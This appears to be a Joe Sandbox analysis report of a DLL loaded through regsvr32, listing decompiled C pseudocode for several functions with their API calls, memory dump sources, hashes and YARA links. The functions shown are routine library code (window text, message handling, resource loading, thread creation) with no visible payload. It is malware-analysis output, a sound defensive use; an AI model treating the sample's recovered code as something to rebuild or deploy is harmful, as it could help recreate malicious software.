                                                                                                                Function 100219F5 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100219F5(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x100b9e70; // 0xbb35530
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A069(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10049170(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1004763E(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}


















                                                                                                                0x100219f5
                                                                                                                0x100219f5
                                                                                                                0x100219fe
                                                                                                                0x10021a05
                                                                                                                0x10021a09
                                                                                                                0x10021a0c
                                                                                                                0x10021a0f
                                                                                                                0x10021a13
                                                                                                                0x10021a15
                                                                                                                0x10021a15
                                                                                                                0x10021a15
                                                                                                                0x10021a1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021a2a
                                                                                                                0x10021a35
                                                                                                                0x10021a3c
                                                                                                                0x10021a4b
                                                                                                                0x10021a74
                                                                                                                0x10021a74
                                                                                                                0x10021a88

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
                                                                                                                • _memset.LIBCMT ref: 10021A3C
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
                                                                                                                • lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
                                                                                                                • SetWindowTextA.USER32(?,1001F17A), ref: 10021A74
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4273134663-0
                                                                                                                • Opcode ID: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
                                                                                                                • Instruction ID: 499d7301ef98d5b65c02851671055dc1f9410084b471d0e54be72e61f8d27827
                                                                                                                • Opcode Fuzzy Hash: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
                                                                                                                • Instruction Fuzzy Hash: FA01D6796012186BEB00DF74DDC4BDF73ACEB15380F4100A1F946D3141DA749E8487A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100354D7 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E100354D7(void* __ecx) {
				struct tagMSG _v28;
				char _v52;
				intOrPtr _v64;
				void* __ebx;
				int __edi;
				void* __esi;
				int __ebp;
				void* _t13;
				void* _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t24;
				void* _t26;

				_t22 = __ecx;
				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) == 0) {
					L11:
					return _t13;
				} else {
					__edi = 0x367;
					__eax =  &_v28;
					__eax = PeekMessageA( &_v28,  *(__esi + 0x20), 0x367, 0x367, 3);
					__ebx = PostMessageA;
					if(__eax == 0) {
						__eax = PostMessageA( *(__esi + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(__esi + 0x20)) {
						__eax = ReleaseCapture();
					}
					__ecx = __esi;
					__eax = E10014BA7(__esi);
					if(__eax != __ebp) {
						 *(__esi + 0x68) = __ebp;
						 *(__eax + 0x68) = __ebp;
						__eax = PostMessageA( *(__esi + 0x20), 0x36a, __ebp, __ebp);
						goto L11;
					} else {
						_push(0);
						_push(_t22);
						_v52 = 0x100b8618;
						L10048E48( &_v52, 0x100aff30);
						asm("int3");
						_push(4);
						E1004764D(0x1008dd26, _t21, _t24, _t26);
						_t23 = E10020454(0x104);
						_v64 = _t23;
						_t19 = 0;
						_v52 = 0;
						if(_t23 != 0) {
							_t19 = E1001DB72(_t23);
						}
						return E10047725(_t19);
					}
				}
			}

















                                                                                                                0x100354d7
                                                                                                                0x100354dc
                                                                                                                0x100354e3
                                                                                                                0x10035545
                                                                                                                0x1003554a
                                                                                                                0x100354e5
                                                                                                                0x100354e9
                                                                                                                0x100354f3
                                                                                                                0x100354f8
                                                                                                                0x10035500
                                                                                                                0x10035506
                                                                                                                0x1003550e
                                                                                                                0x1003550e
                                                                                                                0x10035519
                                                                                                                0x1003551b
                                                                                                                0x1003551b
                                                                                                                0x10035521
                                                                                                                0x10035523
                                                                                                                0x1003552a
                                                                                                                0x10035533
                                                                                                                0x1003553b
                                                                                                                0x10035541
                                                                                                                0x00000000
                                                                                                                0x1003552c
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x1003552a

                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 100354F8
                                                                                                                • PostMessageA.USER32(?,00000367,00000000,00000000), ref: 1003550E
                                                                                                                • GetCapture.USER32 ref: 10035510
                                                                                                                • ReleaseCapture.USER32 ref: 1003551B
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10035541
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CapturePost$PeekRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 1125932295-0
                                                                                                                • Opcode ID: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
                                                                                                                • Instruction ID: a29667abefbe2db7b0d112607e15090e929c334846b5b58c1d4275725dc5be7d
                                                                                                                • Opcode Fuzzy Hash: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
                                                                                                                • Instruction Fuzzy Hash: E701D631504A48AFE221AF22CC84E5B7FBDFB86786F51095DF08686131D632F950C7A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A6DA Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A6DA(void* __ecx, int _a4, int* _a8, intOrPtr* _a12) {
				int _v8;
				int _t12;
				int _t13;
				int _t15;
				int* _t19;
				struct HDC__* _t25;

				_t25 = _a4;
				if(_t25 == 0 || GetDeviceCaps(_t25, 0x58) == 0) {
					_t12 =  *0x100bdc90; // 0x60
					_a4 = _t12;
					_t13 =  *0x100bdc94; // 0x60
				} else {
					_a4 = GetDeviceCaps(_t25, 0x58);
					_t13 = GetDeviceCaps(_t25, 0x5a);
				}
				_t19 = _a8;
				_v8 = _t13;
				 *_a12 = MulDiv(_a4,  *_t19, 0x9ec);
				_t15 = MulDiv(_v8, _t19[1], 0x9ec);
				 *(_a12 + 4) = _t15;
				return _t15;
			}









                                                                                                                0x1000a6e1
                                                                                                                0x1000a6e6
                                                                                                                0x1000a706
                                                                                                                0x1000a70b
                                                                                                                0x1000a70e
                                                                                                                0x1000a6f7
                                                                                                                0x1000a6ff
                                                                                                                0x1000a702
                                                                                                                0x1000a702
                                                                                                                0x1000a713
                                                                                                                0x1000a724
                                                                                                                0x1000a730
                                                                                                                0x1000a738
                                                                                                                0x1000a73f
                                                                                                                0x1000a744

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice
                                                                                                                • String ID:
                                                                                                                • API String ID: 328075279-0
                                                                                                                • Opcode ID: 498338ea87492908b006cc8a3b6be909bbbc3913fbdaaa9e2241c104f56ad4ff
                                                                                                                • Instruction ID: 51676ef5807ffaf306a49f9bbb692178de7f26ca882ce8d59eb7c1b25d8ce487
                                                                                                                • Opcode Fuzzy Hash: 498338ea87492908b006cc8a3b6be909bbbc3913fbdaaa9e2241c104f56ad4ff
                                                                                                                • Instruction Fuzzy Hash: 59011235900218FFEB11DF55CD80D5A7FB9EB86790B14805AFD0897250D7B19D11DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A673 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A673(int _a4, int* _a8, intOrPtr* _a12) {
				int _t9;
				int _t11;
				struct HDC__* _t14;
				int* _t15;
				int _t18;

				_t14 = _a4;
				if(_t14 == 0 || GetDeviceCaps(_t14, 0x58) == 0) {
					_t18 =  *0x100bdc90; // 0x60
					_t9 =  *0x100bdc94; // 0x60
				} else {
					_t18 = GetDeviceCaps(_t14, 0x58);
					_t9 = GetDeviceCaps(_t14, 0x5a);
				}
				_t15 = _a8;
				_a4 = _t9;
				 *_a12 = MulDiv(0x9ec,  *_t15, _t18);
				_t11 = MulDiv(0x9ec, _t15[1], _a4);
				 *(_a12 + 4) = _t11;
				return _t11;
			}








                                                                                                                0x1000a677
                                                                                                                0x1000a67e
                                                                                                                0x1000a69d
                                                                                                                0x1000a6a3
                                                                                                                0x1000a68f
                                                                                                                0x1000a697
                                                                                                                0x1000a699
                                                                                                                0x1000a699
                                                                                                                0x1000a6a8
                                                                                                                0x1000a6ba
                                                                                                                0x1000a6c5
                                                                                                                0x1000a6cb
                                                                                                                0x1000a6d2
                                                                                                                0x1000a6d7

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice
                                                                                                                • String ID:
                                                                                                                • API String ID: 328075279-0
                                                                                                                • Opcode ID: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
                                                                                                                • Instruction ID: 895715aa3ec41fd6efb3120891880696564a458cddba16438aa0474ee140ee27
                                                                                                                • Opcode Fuzzy Hash: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
                                                                                                                • Instruction Fuzzy Hash: D6014F75600318ABEB01DF65CCC4D5B7FADFB8A7A0B18402AFE0857251DA75D801DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002A40C Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002A40C(void* __ebx, void* __edi, void* __ebp, void* __eflags, CHAR* _a4) {
				intOrPtr _v4;
				void* __ecx;
				void* __esi;
				struct HRSRC__* _t6;
				void* _t8;
				struct HRSRC__* _t10;
				struct HRSRC__* _t14;
				intOrPtr _t16;
				void* _t19;
				void* _t21;
				struct HINSTANCE__* _t22;

				_v4 = _t16;
				_t22 =  *(E1001E302(__ebx, __edi, _t21, __eflags) + 0xc);
				if(_t22 != 0) {
					_push(__ebx);
					_t6 = FindResourceA(_t22, _a4, 5);
					_t14 = _t6;
					__eflags = _t14;
					if(_t14 != 0) {
						_push(__ebp);
						_push(__edi);
						_t19 = LoadResource(_t22, _t14);
						_t8 = LockResource(_t19);
						_t10 = E1002A3AE(_v4, _t8, _t8, SizeofResource(_t22, _t14));
						FreeResource(_t19);
						_t6 = _t10;
					}
					return _t6;
				}
				return 0;
			}














                                                                                                                0x1002a40e
                                                                                                                0x1002a417
                                                                                                                0x1002a41c
                                                                                                                0x1002a422
                                                                                                                0x1002a42a
                                                                                                                0x1002a430
                                                                                                                0x1002a432
                                                                                                                0x1002a434
                                                                                                                0x1002a436
                                                                                                                0x1002a437
                                                                                                                0x1002a440
                                                                                                                0x1002a443
                                                                                                                0x1002a459
                                                                                                                0x1002a461
                                                                                                                0x1002a468
                                                                                                                0x1002a46a
                                                                                                                0x00000000
                                                                                                                0x1002a46b
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002A42A
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1002A43A
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1002A443
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 1002A44D
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000000), ref: 1002A461
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 4159136517-0
                                                                                                                • Opcode ID: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
                                                                                                                • Instruction ID: f4c258c3e0f3460aec006f9b603e92ef3604b289b1ebd12ab008e46807a9b7ea
                                                                                                                • Opcode Fuzzy Hash: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
                                                                                                                • Instruction Fuzzy Hash: A8F096766017246FE300AB749D8CDAFB7ECEF876917054469FE01D3211DA75DC0087A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004C8CE Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 27%
                                                                                                                			E1004C8CE(void* __ebx, intOrPtr __edx, void* __edi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				intOrPtr* _v0;
				DWORD* _v8;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* __esi;
				void* _t30;
				void* _t36;
				DWORD* _t41;
				intOrPtr* _t43;
				void* _t45;
				void* _t51;
				intOrPtr* _t54;
				void* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;

				_t64 = __edi;
				_t61 = __edx;
				_t51 = __ebx;
				E1004C648(_v28);
				asm("int3");
				_push(_t67);
				E10051513();
				_t30 = E100514F8(E1005150D());
				if(_t30 != 0) {
					_t54 = _v0;
					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
					_t61 =  *((intOrPtr*)(_t54 + 4));
					_push(_t54);
					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
					E100516E2(__ebx, __edi, _t67, __eflags);
				} else {
					_t67 = _v0;
					if(E1005153D(E1005150D(), _t67) == 0) {
						ExitThread(GetLastError());
					}
					 *_t67 = GetCurrentThreadId();
				}
				_t78 =  *0x100a0c58;
				if( *0x100a0c58 != 0) {
					_t45 = E10054892(_t51, _t64, _t67, _t78);
					_t79 = _t45;
					_t54 = 0x100a0c58;
					if(_t45 != 0) {
						 *0x100a0c58();
					}
				}
				E1004C899(_t61, _t64, _t67, _t79);
				asm("int3");
				_push(_t54);
				_push(_t51);
				_push(_t64);
				_t65 = _v0;
				_t80 = _t65;
				_v20 = 0;
				if(_t65 != 0) {
					_push(_t67);
					E10051513();
					_t68 = E1005496F(1, 0x214);
					__eflags = _t68;
					if(__eflags == 0) {
						L16:
						_push(_t68);
						E100470E9(0, _t65, _t68, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E100490BD(_v8);
						}
						_t36 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E100516CA(_t61, _t65, __eflags) + 0x6c)));
						_push(_t68);
						E10051593(0, _t65, _t68, __eflags);
						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t68 + 0x58)) = _a16;
						_t41 = _a24;
						__eflags = _t41;
						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
						if(_t41 == 0) {
							_t41 =  &_a12;
						}
						_t36 = CreateThread(_a4, _a8, "V�3L", _t68, _a20, _t41);
						__eflags = _t36;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L16;
						}
					}
				} else {
					_t43 = E10049097(_t80);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t43 = 0x16;
					E10050228(0, _t61, _t65);
					_t36 = 0;
				}
				return _t36;
			}




















                                                                                                                0x1004c8ce
                                                                                                                0x1004c8ce
                                                                                                                0x1004c8ce
                                                                                                                0x1004c8d4
                                                                                                                0x1004c8d9
                                                                                                                0x1004c8da
                                                                                                                0x1004c8db
                                                                                                                0x1004c8e6
                                                                                                                0x1004c8ed
                                                                                                                0x1004c91a
                                                                                                                0x1004c921
                                                                                                                0x1004c927
                                                                                                                0x1004c92a
                                                                                                                0x1004c92d
                                                                                                                0x1004c92e
                                                                                                                0x1004c931
                                                                                                                0x1004c8ef
                                                                                                                0x1004c8ef
                                                                                                                0x1004c901
                                                                                                                0x1004c90a
                                                                                                                0x1004c90a
                                                                                                                0x1004c916
                                                                                                                0x1004c916
                                                                                                                0x1004c936
                                                                                                                0x1004c93d
                                                                                                                0x1004c944
                                                                                                                0x1004c949
                                                                                                                0x1004c94b
                                                                                                                0x1004c94c
                                                                                                                0x1004c94e
                                                                                                                0x1004c94e
                                                                                                                0x1004c94c
                                                                                                                0x1004c954
                                                                                                                0x1004c959
                                                                                                                0x1004c95d
                                                                                                                0x1004c95e
                                                                                                                0x1004c95f
                                                                                                                0x1004c960
                                                                                                                0x1004c965
                                                                                                                0x1004c967
                                                                                                                0x1004c96a
                                                                                                                0x1004c988
                                                                                                                0x1004c989
                                                                                                                0x1004c99a
                                                                                                                0x1004c99c
                                                                                                                0x1004c9a0
                                                                                                                0x1004c9ec
                                                                                                                0x1004c9ec
                                                                                                                0x1004c9ed
                                                                                                                0x1004c9f2
                                                                                                                0x1004c9f6
                                                                                                                0x1004c9fb
                                                                                                                0x1004ca00
                                                                                                                0x1004ca01
                                                                                                                0x1004ca01
                                                                                                                0x1004c9a2
                                                                                                                0x1004c9a7
                                                                                                                0x1004c9aa
                                                                                                                0x1004c9ab
                                                                                                                0x1004c9b3
                                                                                                                0x1004c9b7
                                                                                                                0x1004c9ba
                                                                                                                0x1004c9bd
                                                                                                                0x1004c9c1
                                                                                                                0x1004c9c4
                                                                                                                0x1004c9c6
                                                                                                                0x1004c9c6
                                                                                                                0x1004c9d9
                                                                                                                0x1004c9df
                                                                                                                0x1004c9e1
                                                                                                                0x1004c9e9
                                                                                                                0x00000000
                                                                                                                0x1004c9e9
                                                                                                                0x1004c9e1
                                                                                                                0x1004c96c
                                                                                                                0x1004c96c
                                                                                                                0x1004c971
                                                                                                                0x1004c972
                                                                                                                0x1004c973
                                                                                                                0x1004c974
                                                                                                                0x1004c975
                                                                                                                0x1004c976
                                                                                                                0x1004c97c
                                                                                                                0x1004c984
                                                                                                                0x1004c984
                                                                                                                0x1004ca07

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1004C648: _doexit.LIBCMT ref: 1004C650
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 1004C8DB
                                                                                                                  • Part of subcall function 10051513: TlsGetValue.KERNEL32 ref: 10051519
                                                                                                                  • Part of subcall function 10051513: __decode_pointer.LIBCMT ref: 10051529
                                                                                                                  • Part of subcall function 10051513: TlsSetValue.KERNEL32(00000000,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10051536
                                                                                                                  • Part of subcall function 100514F8: TlsGetValue.KERNEL32 ref: 10051502
                                                                                                                • __freefls@4.LIBCMT ref: 1004C931
                                                                                                                  • Part of subcall function 1005153D: __decode_pointer.LIBCMT ref: 1005154B
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 1004C903
                                                                                                                • ExitThread.KERNEL32 ref: 1004C90A
                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 1004C910
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2731880238-0
                                                                                                                • Opcode ID: eeff3220b4e3d4111d560619d6bed87ca2da64caf98b4cfa3b310ab2fe29a7af
                                                                                                                • Instruction ID: 107d468faa5f2f46790708104265d17c1d0834f367b3a6405ef7d8c8fef7de54
                                                                                                                • Opcode Fuzzy Hash: eeff3220b4e3d4111d560619d6bed87ca2da64caf98b4cfa3b310ab2fe29a7af
